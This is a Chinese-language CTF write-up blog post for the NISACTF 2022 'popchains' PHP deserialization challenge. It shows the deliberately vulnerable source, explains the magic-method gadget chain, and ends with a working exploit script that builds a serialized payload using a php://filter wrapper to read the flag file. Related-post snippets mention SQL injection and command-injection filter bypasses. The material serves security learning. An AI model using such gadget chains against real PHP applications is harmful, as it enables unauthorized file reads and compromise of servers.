【PHP反序列化】[NISACTF 2022]popchains【易】

最新推荐文章于 2024-08-12 10:31:29 发布
最新推荐文章于 2024-08-12 10:31:29 发布
阅读量134 收藏
点赞数 1
文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63533250/article/details/133817765
版权
本文分析了一个PHP反序列化CTF题目,涉及文件包含、魔术方法和安全防护。作者通过Try_Work_Hard和Make_a_Change类的使用,展示了如何利用代码注入,并解释了如何通过构造和触发魔术方法防止恶意操作。
摘要由CSDN通过智能技术生成

最近,打算刷一刷PHP反序列化相关的CTF题目,再沉淀沉淀。

题目:

新年快乐~ 许愿
<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/

分析:

分析一下,我的习惯是用反推法,先找我们利用的地方。

1.在Try_Work_Hard类中有一个append方法,有一个include()函数,这里可以联系到文件包含,再结合php协议读取文件数据。

class Try_Work_Hard{
    protected  $var ="php://filter/read=convert.base64-encode/resource=/flag";
}

2.那么,如何调用append()方法呢?可以看到Try_Work_Hard__invoke()魔术方法可以调用,怎么触发__invoke()方法呢?__invoke()的触发条件是:把对象当作函数是被被调用。那就找那个对象被当作函数了。

3.可以看到 MAKE_a_Change 类中,把$function 对象当作了函数来调用。条件是__get()魔术方法得被调用。看一下__get()魔术方法的触发条件:读取不可访问或者不存在的属性的时候,进行赋值,找找符合触发条件的代码,如果 $this ->string = MAKE_a_Change的话,就会访问其page 属性,而其类中没有此方法则会调用__get().

4. __toString():类被当成字符串时触发。在正则匹配这个地方 ,如果$page 是一个对象,那么进入正则 $this->page 当做了字符串去匹配了。也就触发了 __toString。

构造pop

<?php

class Road_is_Long{
    public $page;
    public $string;
    // public function __construct($file='index.php'){
    //     $this->page = $file;
    // }
    // public function __toString(){
    //     return $this->string->page;
    // }
    // public function __wakeup(){
    //     if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
    //         echo "You can Not Enter 2022";
    //         $this->page = "index.php";
    //     }
    // }
}
class Try_Work_Hard{
    protected  $var ="php://filter/read=convert.base64-encode/resource=/flag";
//     public function append($value){
//         include($value);
//     }
//     public function __invoke(){
//         $this->append($this->var);
//     }
}
class Make_a_Change{
    public $effort;
    // public function __construct(){
    //     $this->effort = array();
    // }

    // public function __get($key){
    //     $function = $this->effort;
    //     return $function();
    // }
} 
$a = new Road_is_Long();
$a ->page = new Road_is_Long();
$a ->page->string = new Make_a_Change();
$a ->page->string ->effort =new Try_Work_Hard();
echo urlencode(serialize($a));

白花前胡ovo
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[NISACTF 2022]popchains - 反序列化+伪协议
oZuoShen123的博客
10-07 1460
链条:Road_is_Long(construct->wakeup【page=$r】-> toString【string=$m】)-> Make_a_Change(construct->get【effort=$t】)-> Try_Work_Hard(invoke->append【var='php://filter/read=convert.base64-encode/resource=/flag'】)
[NISACTF 2022]
snowlyzz的博客
09-09 6149
NISACTF部分WP
NSS [NISACTF 2022]popchains
Jay17的博客
04-12 252
NSS [NISACTF 2022]popchains
[NISACTF 2022]popchains
m0_73612768的博客
01-04 985
PHP 反序列化,preg_match 触发 __toString 魔术方法;
[NISACTF 2022]下
qq_62046696的博客
07-30 2467
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
[NISACTF 2022]WriteUp web篇
Pysnow's Blog
04-01 4573
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
CTF-反序列化(持续更新)
m0_74317362的博客
07-27 836
魔术方法__construct() 当一个对象创建时自动调用__destruct() 当对象被销毁时自动调用 (php绝大多数情况下会自动调用销毁对象)__sleep() 使**用serialize()函数时触发__wakeup 使用unserialse()**函数时会自动调用__toString 当一个对象被当作一个字符串被调用。__call() 在对象上下文中调用不可访问的方法时触发__callStatic() 在静态上下文中调用不可访问的方法时触发。
web 反序列化 刷题记录
rev1ve的博客
05-20 363
首先找到跟flag有关的,发现是w44m的Getflag(),结合if语句,我们要让admin = ‘w44m’ 和passwd ='08067’成立。,那么我们可以给var赋值用php伪协议去读取flag,调用append()方法得先调用 __invoke()(读取不可访问或者不存在的属性的时候,进行赋值,才能调用__get())再往前推,w22m的echo语句可以调用__toString();再往前推,发现w33m的__toString()的**(调用了函数方式可以调用 __invoke())
解:[NISACTF 2022]popchains--TLS_预备队任务(1)
river_mouth_man的博客
03-08 623
php反序列化,构造pop链
php json与xml序列化/反序列化
10-26
在Web开发中,数据交换和存储常常涉及到对象的序列化和反序列化PHP提供了多种方式来处理这一过程,其中最常用的两种格式是JSON(JavaScript Object Notation)和XML(eXtensible Markup Language)。这两种格式都...
详解PHP序列化和反序列化原理
10-18
本篇文章给大家分享了下PHP反序列化漏洞系列之PHP序列化和反序列化原理的相关知识,有这方面需要的朋友参考学习下吧。
PHP常见的序列化与反序列化操作实例分析
10-16
PHP编程中,序列化和反序列化是两种非常重要的数据处理技术,它们主要用于将复杂的变量结构转换为可存储或传输的格式,然后再恢复为原始形式。本文将深入探讨这两个概念,结合实例来分析PHP中如何使用`serialize()...
php中序列化与反序列化详解
10-20
本文介绍了php中序列化与反序列化的相关知识。具有很好的参考价值,下面跟着小编一起来看下吧
thinkphp漏洞之sql注入漏洞-builder处漏洞
banliyaoguai的博客
08-09 498
这个代码中上面第一个红框将data数组中遍历,然后val中就是data的值,然后看第二个红框三个不同的参数对应不同的处理方式,这三个处理方式都可以进行注入,但是insert方法中会对exp进行过滤如果数据中存在 exp ,则会被替换成 exp空格,所以三种处理方式中选项等于exp的无法使用。这里是接收一个get传参,然后username/a的意思是有username传参username的值就是传参的值没有的话就是默认是a。看一下他的insert这个函数,数据传输是自己写的值。方法来分析并处理数据。
LNMP环境搭建论坛
qq_63652578的博客
08-07 1003
root@Rocky8-node1 ~]# mv upload/* /usr/share/nginx/html/ #把upload下的所有内容移动到/usr/share/nginx/html/[root@Rocky8-node1 ~]# sed -i '/^group =/ c \group = nginx' /etc/php-fpm.d/www.conf #将组改为nginx。
[FSCTF 2023]细狗2.0
2301_81462177的博客
08-09 299
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
PHP图书借阅微信小程序系统源码
最新发布
2401_84414018的博客
08-12 138
图书借阅微信小程序”不仅是一个借阅工具,更是你探索知识、享受阅读的得力助手。在这个快节奏的时代,让我们一起慢下来,用阅读滋养心灵,开启一段段美妙的阅读旅程吧!快来加入我们,发现更多阅读的乐趣和惊喜!📚🌟。
【信创】Linux系统如何使用命令行或图形化工具禁用ipv6 _ 统信 _ 麒麟 _ 中科方德
鹏大圣运维
08-09 1057
Hello,大家好啊,今天给大家带来一篇关于在Linux系统中如何使用命令行或Grub Customizer工具禁用IPv6的文章。IPv6在某些环境下可能会引起网络问题或不必要的复杂性,因此禁用它可能会提高系统的稳定性和性能。本文将详细介绍两种禁用IPv6的方法。欢迎大家分享转发,点个关注和在看吧!
Java对象序列化与反序列化详解
"本章主要介绍了Java对象的序列化与反序列化,包括基本概念、实现过程、相关接口以及注意事项。" 在Java编程中,对象的序列化与反序列化是两个重要的概念。对象序列化是将Java对象转换为可存储或可传输的二进制字节...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白花前胡ovo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值